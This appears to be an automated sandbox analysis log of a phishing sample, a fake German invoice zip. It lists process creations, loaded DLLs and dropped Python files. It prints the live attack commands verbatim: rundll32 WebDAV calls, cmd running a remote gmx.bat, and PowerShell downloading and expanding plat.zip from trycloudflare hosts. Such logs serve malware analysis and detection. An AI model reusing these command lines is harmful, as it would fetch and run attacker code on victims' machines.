Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?rlkey=jd0edpow40fhsvvb7o73yg1xi&st=x3gp2xzd&dl=0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1984,i,9398603953656203012,10552116802487828007,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1984,i,9398603953656203012,10552116802487828007,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie giants-twisted-article-promise.trycloudflare.com@SSL https://giants-twisted-article-promise.trycloudflare.com/
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie giants-twisted-article-promise.trycloudflare.com@SSL https://giants-twisted-article-promise.trycloudflare.com/
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c \\giants-twisted-article-promise.trycloudflare.com@SSL\DavWWWRoot\gmx.bat
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\GAOBCVIQIJ.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2292 --field-trial-handle=1376,i,10109096854314959362,999452491269217951,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 6544CEC3CA706666300F11E280428F5E
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\GAOBCVIQIJ.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2292 --field-trial-handle=1376,i,10109096854314959362,999452491269217951,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie giants-twisted-article-promise.trycloudflare.com@SSL https://giants-twisted-article-promise.trycloudflare.com/gmx.bat
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie giants-twisted-article-promise.trycloudflare.com@SSL https://giants-twisted-article-promise.trycloudflare.com/gmx.bat
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\plat.zip' -DestinationPath 'C:\Users\user\Downloads' -Force }"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\plat.zip' -DestinationPath 'C:\Users\user\Downloads' -Force }"
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\crash_reporter.cfg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\user\Downloads\plat.zip' }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_queue.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\pyshellext.amd64.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_asyncio.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_sqlite3.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_zoneinfo.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\tk86t.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\pyw.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_lzma.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes_test.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_elementtree.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_hashlib.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testmultiphase.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testcapi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libffi-8.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\zlib1.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testsinglephase.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\winsound.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\unicodedata.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_multiprocessing.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libcrypto-3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testconsole.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testimportmultiple.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_decimal.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\py.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testclinic.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_overlapped.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libssl-3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\tcl86t.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testbuffer.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_uuid.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_msi.pydJump to dropped file
